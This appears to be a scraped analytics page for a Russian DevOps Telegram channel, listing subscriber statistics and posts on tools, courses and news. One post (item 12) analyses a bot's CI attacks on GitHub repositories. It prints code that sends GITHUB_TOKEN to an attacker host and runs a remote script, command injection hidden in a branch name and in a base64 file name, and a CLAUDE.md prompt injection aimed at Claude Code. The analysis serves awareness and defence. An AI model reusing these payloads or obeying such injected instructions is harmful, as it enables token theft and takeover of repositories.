DeVops Библиотека
前往频道在 Telegram
Гайды, уроки и книги для Devops специалситов по всем вопросам @workakkk
显示更多9 383
订阅者
-224 小时
-157 天
-5330 天
数据加载中...
吸引订阅者
七月 '26
七月 '26
+28
在0个频道中
六月 '26
+50
在0个频道中
Get PRO
五月 '26
+59
在0个频道中
Get PRO
四月 '26
+86
在0个频道中
Get PRO
三月 '26
+139
在0个频道中
Get PRO
二月 '26
+269
在1个频道中
Get PRO
一月 '26
+305
在0个频道中
Get PRO
十二月 '25
+107
在0个频道中
Get PRO
十一月 '25
+190
在0个频道中
Get PRO
十月 '25
+118
在0个频道中
Get PRO
九月 '25
+378
在3个频道中
Get PRO
八月 '25
+205
在0个频道中
Get PRO
七月 '25
+457
在1个频道中
Get PRO
六月 '25
+299
在0个频道中
Get PRO
五月 '25
+117
在0个频道中
Get PRO
四月 '25
+3 767
在1个频道中
Get PRO
三月 '250
在0个频道中
Get PRO
二月 '250
在0个频道中
Get PRO
一月 '250
在0个频道中
Get PRO
十二月 '240
在0个频道中
Get PRO
十一月 '240
在1个频道中
Get PRO
十月 '240
在1个频道中
Get PRO
九月 '24
+26
在0个频道中
Get PRO
八月 '24
+652
在0个频道中
Get PRO
七月 '24
+641
在0个频道中
Get PRO
六月 '24
+849
在1个频道中
Get PRO
五月 '24
+360
在35个频道中
Get PRO
四月 '24
+339
在44个频道中
Get PRO
三月 '24
+334
在20个频道中
Get PRO
二月 '24
+181
在0个频道中
Get PRO
一月 '24
+302
在43个频道中
Get PRO
十二月 '23
+1 888
在39个频道中
| 日期 | 订阅者增长 | 提及 | 频道 | |
| 14 七月 | +2 | |||
| 13 七月 | +2 | |||
| 12 七月 | +2 | |||
| 11 七月 | +1 | |||
| 10 七月 | +2 | |||
| 09 七月 | +2 | |||
| 08 七月 | +2 | |||
| 07 七月 | +4 | |||
| 06 七月 | +1 | |||
| 05 七月 | 0 | |||
| 04 七月 | +4 | |||
| 03 七月 | +5 | |||
| 02 七月 | 0 | |||
| 01 七月 | +1 |
频道帖子
Нашли готовую виртуальную машину для OSINT-исследований — Trace Labs OSINT VM.
Это не «магическая пробивалка», а отдельная рабочая среда для легального поиска по открытым источникам: CTF, фактчекинг, расследования, поиск цифровых следов и обучение OSINT.
Что внутри:
* Sherlock — поиск аккаунтов по username
* PhoneInfoga — анализ открытых данных по номерам
* SpiderFoot и sn0int — автоматизация OSINT-проверок
* theHarvester и h8mail — работа с email и утечками
* Shodan CLI — поиск по открытым интернет-устройствам
* Sublist3r — поддомены
* exiftool и steghide — метаданные и стеганография
* Obsidian — заметки прямо во время исследования
Главный плюс - всё уже собрано в изолированной VM, не нужно засорять основную систему десятками инструментов.
Подходит для обучения, CTF и легальных расследований по открытым данным.
https://github.com/tracelabs/tlosint-vm
| 2 | Пользователи Linux, которые удалили Windows, чтобы уйти от Microsoft и выбрать свободу вместе с Linux, возможно, ещё не ушли окончательно.
У Microsoft есть криптографический ключ, который позволяет запускаться всем крупным Linux-дистрибутивам на современном железе.
Ubuntu. Fedora. Debian. Все они.
Без подписи Microsoft ваша Linux-машина не стартует.
И срок действия этого ключа истекает через 4 дня - 27 июня 2026 года.
Вот что происходит на самом деле.
Когда в 2012 году появился Secure Boot, Microsoft фактически стала центром сертификации для всей экосистемы загрузки ПК.
Каждый Linux bootloader должен быть подписан Microsoft, чтобы запускаться на UEFI-машине с включённым Secure Boot.
Хорошая новость: ваш уже установленный Linux продолжит загружаться после 27 июня.
Плохая новость касается всего, что будет дальше.
• любой новый shim binary после 27 июня уже нельзя будет подписать старым ключом
• если ваша прошивка не получит новые сертификаты Microsoft 2023 года, свежие установки дистрибутивов могут не загрузиться
• старые ноутбуки, железо от небольших вендоров и embedded-устройства без обновлений прошивки могут зависнуть в серой зоне навсегда
• Dell, HP и Lenovo уже выпустили обновления, но многие мелкие производители - нет. Никто точно не знает, сколько устройств выпадет из поддержки
Для большинства пользователей решение простое:
sudo fwupdmgr update
Но главная история здесь глубже.
Linux-сообщество годами спорило о свободе и независимости от Microsoft.
А всё это время у Microsoft был ключ, от которого зависела загрузка почти каждой Linux-машины на современном ПК.
Это не конспирология.
Так просто был устроен Secure Boot.
Обновитесь.
А потом подумайте, что это значит.
Подробности:
https://zdnet.com/article/aspirin-for-linuxs-microsofts-secure-boot-headache/ | 849 |
| 3 | ✔️ Stack Overflow больше не строится вокруг разработчиков. Теперь он строится вокруг ИИ-агентов.
Платформа запустила Stack Overflow for Agents — место, где AI coding agents могут задавать вопросы, делиться решениями и помогать друг другу разбираться с задачами.
И это хорошо показывает, куда движется разработка.
В 2014 году на Stack Overflow публиковали около 289 000 вопросов в месяц. К концу 2025-го число упало до нескольких тысяч — почти до уровня первых лет существования сайта.
ChatGPT не просто стал конкурентом. Он сделал то же самое, но быстрее, мягче и без модератора, который объясняет, что твой вопрос «не по теме».
Поэтому Stack Overflow меняет роль.
Если разработчики теперь спрашивают ИИ, значит Stack Overflow станет местом, где ИИ-агенты спрашивают друг друга.
Как это работает:
* перед задачей агент сначала ищет ответ в базе
* если ответ есть, он использует его
* если ответа нет, но агент решил проблему, он готовит пост на проверку человеком
* форматы постов: вопросы, TIL — Today I Learned, и Blueprints — переиспользуемые паттерны
* каждый агент привязан к аккаунту человека
* репутация агента влияет на репутацию владельца
* ничего не попадает в общую базу знаний без человеческого подтверждения
CEO назвал проблему “ephemeral intelligence gap”.
Смысл простой: ИИ-агенты снова и снова решают одни и те же задачи, но после завершения сессии знания исчезают. Stack Overflow хочет это исправить.
15 лет назад Stack Overflow был местом, куда приходили застрявшие разработчики.
Теперь это место, куда будут приходить застрявшие ИИ-агенты.
Инструмент, который заменил привычный поток вопросов от разработчиков, теперь сам становится клиентом Stack Overflow.
http://agents.stackoverflow.com | 1 037 |
| 4 | ⚡️ Kali Linux Roadmap: с чего начать в этичном хакинге
Нашёл нормальный roadmap по Kali Linux для тех, кто хочет не просто «поставить Kali и открыть терминал», а постепенно разобраться, как всё это работает.
Внутри маршрут по базовым темам: установка, настройка окружения, работа с терминалом, Linux-команды, сеть, безопасность, инструменты Kali и практика.
Это полезно тем, кто только заходит в кибербезопасность и не понимает, за что браться первым. Kali часто выглядит как набор страшных утилит, но без базы по Linux, сетям и правам доступа эти инструменты быстро превращаются в хаос.
Хороший подход здесь простой: сначала понять систему, потом сеть, потом инструменты, и только после этого переходить к практике в легальных лабораториях и CTF.
Такой roadmap удобно проходить как чек-лист: открыл раздел, разобрал команды, повторил руками, закрепил на тестовом окружении.
Для старта в Kali Linux это намного лучше, чем хаотично смотреть ролики и копировать команды без понимания.
https://github.com/justxor/Kalilinuxroadmap/tree/main | 1 039 |
| 5 | ⚡️ Linux Roadmap: подробный практический курс от нуля до уверенного администратора
Это пошаговый маршрут изучения Linux с упором на практику. Каждый раздел содержит объяснение «почему это устроено именно так», разбор команд и обязательные задания, которые нужно выполнить руками в терминале. Чтение без повторения навыка не даёт — держите терминал открытым рядом с этим текстом.
Как работать с этим курсом: идите сверху вниз, не перепрыгивайте разделы; каждую команду набирайте руками, а не копируйте; в конце каждого блока выполняйте задание; специально ломайте систему в виртуалке и чините — это лучший способ учиться.
https://github.com/justxor/linuxfullroadmap/ | 1 101 |
| 6 | io_uring без розовых очков: 5 граблей, которые сожгли мне неделю, и где он реально быстрее epoll
Прод. Сервис на Go, 80k RPS, p99 latency 12 мс. Читаю Phoronix, новость: "io_uring быстрее epoll в 2-4 раза". Решаю переписать сетевую часть. Через неделю - откат в master. p99 не упал, а вырос до 18 мс, CPU подскочил на 15%, под нагрузкой иногда залипает на 200-400 мс. Эта статья - не про "io_uring - будущее async I/O", а про то, что в этом будущем реально работает в 2026 году, что нет, и где меня обманули бенчмарки.
https://habr.com/ru/articles/1039820/ | 1 210 |
| 7 | 🖥 C# Roadmap: с нуля до профи
Практическое руководство по росту в C#-разработке. Материал собран для тех, кто хочет получить инженерную глубину, а не просто накликать CRUD по туториалам.
Здесь последовательность изучения, лучшие практики, ресурсы и трезвый разбор того, как работать с ИИ-инструментами и оставаться востребованным.
https://github.com/Develp10/Csharp_Roadmap/ | 1 204 |
| 8 | 👣 Твой код на Rust компилируется, проходит тесты и является UB. Ты просто об этом не знаешь
Если взять случайный крейт с crates.io, поставить на него Miri и подождать минут пять, шанс увидеть красное сообщение про undefined behavior где-то в зависимостях стремится к единице. Чаще всего виноват не автор хитрого unsafe-блока ради скорости, а вполне обычная библиотека, которой пять лет, у которой звёзд на гитхабе больше, чем у твоего пет-проекта строчек кода, и которая всё это время спокойно лежит в продакшене.
Самое неприятное в этой истории то, что компилятор ничего не скажет. Тесты пройдут. Бенчмарки покажут красивые наносекунды. А потом LLVM 19 обновится до LLVM 20, поменяет один проход оптимизации, и твой сервис начнёт ронять прод по понедельникам. Чтобы понять, почему так происходит, придётся залезть в три темы, которые в обычной жизни Rust-разработчика не встречаются: pointer provenance, Stacked Borrows и пришедшую им на смену Tree Borrows.
https://uproger.com/tvoj-kod-na-rust-kompiliruetsya-prohodit-testy-i-yavlyaetsya-ub-ty-prosto-ob-etom-ne-znaesh/ | 1 067 |
| 9 | Быстрый анализ загрузки через systemd-analyze
На сервере все ок: железо норм, диски норм, но после ребута он думает о смысле жизни секунд 40. Обычно лезешь сразу в сервисы, логи и смотришь что запустилось, а что еще нет. Но иногда юнит не падает, а просто висит в starting и ждёт сеть, DNS, диск или маунт.
Что делает systemd-analyze
systemd-analyze вскрывает сколько заняло ядро, сколько занял userspace, и какие юниты съели время.
Кто тормозит
systemd-analyze blame
Она покажет список юнитов, отсортированный по времени старта. Важно: это не всегда время выполнения, а то, сколько юнит считался стартующим. Но обычно виновники видны сразу.
Дерево зависимостей
Когда юнит тормозит, часто причина не в нём, а в том, что он ждёт сеть, диск, другой сервис.
systemd-analyze critical-chain
Эта штука показывает цепочку, что блокировало путь до default.target. Видно кто кого ждал и где пробка.
График загрузки для красивого разбора
Если хочется визуально показать коллеге почему оно долго стартует, есть SVG-таймлайн.
systemd-analyze plot > boot.svg
Открываешь boot.svg в браузере и видишь полосочки, кто и когда стартовал.
Вывод
systemd-analyze это твой способ увидеть кто, где и почему тормозит загрузку и кто кого ожидает. | 811 |
| 10 | 🖥 На Stepik обновили курс «C# с нуля до профи»
Представьте: через четыре месяца вы открываете чужой .NET-проект и читаете его как книгу.
IServiceCollection не вызывает ступора. async Task<IActionResult> пишется на автомате. Вы точно знаете, почему EF Core сгенерировал именно такой SQL - и как переписать запрос, чтобы он летал.
Это не фантазия. Это результат после 16 модулей, в которых каждая концепция объясняется через код и закрепляется практикой.
ООП, SOLID, LINQ, async/await, DI, EF Core, ASP.NET Core, Docker, Kubernetes - всё, что казалось магией, станет рабочим инструментом.
А бонусом - портфолио проектов: от CLI-утилит и REST API до собственного SaaS с multi-tenancy, JWT и деплоем в Kubernetes под TLS.
Скидка - 58% доступна 48 часов: https://stepik.org/a/282984/ | 899 |
| 11 | 🚀 Мощный панель управления для игровых серверов
MCSManager — это современная веб-панель для управления серверами Minecraft, Steam и другими играми. Она позволяет легко управлять несколькими серверами с одного интерфейса, предлагая надежную систему разрешений для пользователей и поддержку многоязычности.
🚀 Основные моменты:
- Быстрая установка игровых серверов с помощью встроенного магазина приложений.
- Поддержка множества игр, включая Terraria и Project Zomboid.
- Настраиваемый интерфейс с возможностью перетаскивания элементов.
- Поддержка Docker и коммерческого хостинга.
- Легковесная архитектура на TypeScript.
📌 GitHub: https://github.com/MCSManager/MCSManager | 894 |
| 12 | 📎 Один бот, пять техник
За неделю автономный бот атаковал пять крупных репозиториев и каждый раз использовал новый способ. Пейлоад во всех случаях одинаковый — curl -sSfL hackmoltrepeat.com/molt | bash. Менялось только то, как заставить CI его выполнить.
Атака 1. avelino/awesome-go — кража токена через Go init()
Воркфлоу использует pull_request_target и делает checkout кода из форка, затем запускает его. Это классический Pwn Request — код выполняется с правами целевого репозитория, а не форка.
Бот добавил функцию init() в Go-скрипт качества кода. В Go init() запускается автоматически до main(), поэтому вырезать её из потока выполнения нельзя.
В последнем PR функция сначала отправляла GITHUB_TOKEN на сервер атакующего, потом запускала пейлоад:
func init() {
_ = exec.Command("bash", "-c",
`curl -s -H "Authorization: Bearer $GITHUB_TOKEN"` +
`-d "token=$GITHUB_TOKEN&repo=$GITHUB_REPOSITORY"` +
`https://recv.hackmoltrepeat.com/ &&` +
`curl -sSfL https://hackmoltrepeat.com/molt | bash`).Run()
}
Воркфлоу завершился успешно. Шаг занял 5 минут 37 секунд вместо нескольких секунд. Токен с правами contents: write и pull-requests: write ушёл на внешний сервер.
Атака 2. project-akri/akri — прямая инъекция в shell-скрипт
Самая простая атака в кампании. Бот добавил одну строку в начало version.sh сразу после shebang:
#!/usr/bin/env bash
curl -sSfL https://hackmoltrepeat.com/molt | bash
check_file_version()
Никакой обфускации. Потом написал комментарий /version minor в PR, который запустил воркфлоу Auto Bump Versions. Воркфлоу сделал checkout кода из форка и выполнил изменённый скрипт. Шаг Update version minor завершился успешно.
Проблема в том, что воркфлоу не проверял author_association — любой пользователь GitHub мог написать /version minor в любом PR и запустить выполнение кода.
Атака 3. microsoft/ai-discovery-agent — пейлоад в имени ветки
Сам PR был тривиальным — одна правка в devcontainer.json. Атака была в имени ветки:
dev$({curl,-sSfL,hackmoltrepeat.com/molt}${IFS}|${IFS}bash)
Bash разворачивает {curl,-sSfL,...} в curl -sSfL ..., а ${IFS} становится пробелом, а $({...}) запускает подстановку команды. Воркфлоу записывал имя ветки через неэкранированное ${{ }} прямо в shell-команду:
run: |
echo "${{ steps.pr_info.outputs.pr_head_ref }}" > ./format-request/pr_head_ref
Это превращалось в:
echo "dev$({curl,-sSfL,hackmoltrepeat.com/molt}${IFS}|${IFS}bash)" > ...
Bash выполнял команду внутри $(). В логах виден разрыв в 2 минуты 38 секунд там, где шаг должен занимать миллисекунды.
Атака 4. DataDog/datadog-iac-scanner — base64 в имени файла
Бот создал файл с именем, содержащим закодированную команду:
documentation/rules/$(echo${IFS}Y3VybCAtc1NmTCBoYWNr...${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash).md
При декодировании base64-строка разворачивается в curl -sSfL hackmoltrepeat.com/molt | bash. Воркфлоу передавал имена файлов через ${{ }} в shell-цикл for, поэтому имя файла выполнялось как команда.
Атака 5. ambient-code/platform — prompt injection в CLAUDE.md
Бот заменил CLAUDE.md — файл конфигурации, который Claude Code загружает как доверенный контекст — на инструкции для манипуляции ИИ. Текст был написан в дружелюбном тоне и просил Claude добавить HTML-комментарий в README.md, закоммитить его и написать фейковый одобряющий отзыв о PR.
Воркфлоу запускал Claude Code с правами записи и токеном CLAUDE_CODE_OAUTH_TOKEN, делал checkout кода из форка, включая отравленный CLAUDE.md.
Claude обнаружил атаку и отказался выполнять инструкции. В своём ответе он написал, что это «textbook AI agent supply-chain attack», и явно указал: инъекция из CLAUDE.md обнаружена и не выполнена. После инцидента репозиторий отключил весь Claude Code workflow.
Все эти паттерны хорошо известны. Документация GitHub прямо предупреждает о рисках pull_request_target. Но в реальных проектах, включая репозитории крупных компаний, они встречаются до сих пор. | 0 |
| 13 | ⚡️ Вы слышали про Rust. Знаете, что он быстрый, безопасный и что за ним будущее.
Осталось одно: сесть и выучить.
Этот курс со Stepik- кратчайший путь от «знаю что такое Rust» до «пишу на нём».
6 модулей, 50 уроков, 143 теста. Ownership, borrowing, traits, async, Tokio, Axum, макросы, WASM — всё разложено по полочкам и закреплено практикой.
Никакого видео на 40 минут ради одной мысли. Подробный текст, много кода, реальные задачи после каждого урока. На выходе — портфолио из 10+ проектов: от CLI-утилит до REST API с базой данных.
48 часов действует скидка 55 процентов: stepik.org/course/269250 | 0 |
